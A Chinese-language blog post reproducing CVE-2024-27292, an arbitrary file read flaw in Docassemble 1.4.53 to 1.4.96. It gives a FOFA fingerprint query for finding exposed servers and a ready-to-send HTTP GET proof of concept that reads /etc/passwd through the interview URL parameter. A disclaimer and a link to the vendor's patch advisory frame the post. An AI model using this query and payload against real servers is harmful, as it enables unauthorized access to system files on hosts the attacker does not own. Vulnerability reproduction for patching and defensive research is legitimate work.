CVE-2024-27292：Docassemble任意文件讀取漏洞復現 [附POC]

0x01 前言

免責聲明：請勿利用文章內的相關技術從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負責，所產生的一切不良后果與文章作者無關。該文章僅供學習用途使用！！！

0x02 漏洞描述

Docassemble是Jonathan Pyle個人開發者的一個免費的開源專家系統，用于指導訪談和文檔組裝。Docassemble 1.4.53至1.4.96版本存在安全漏洞，該漏洞源于允許攻擊者通過操作URL獲得對系統信息的未授權的訪問導致任意文件讀取。

0x03 影響版本

Docassemble Docassemble 1.4.96
Docassemble Docassemble 1.4.53

0x04 漏洞環境

FOFA語法：icon_hash=“-575790689”

0x05 漏洞復現

1.訪問漏洞環境

2.構造POC

POC （GET）

GET /interview?i=/etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

3.復現

查看/etc/passwd文件

0x06 修復建議

目前廠商已經發布了升級補丁以修復這個安全問題，請到廠商的主頁下載：

https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv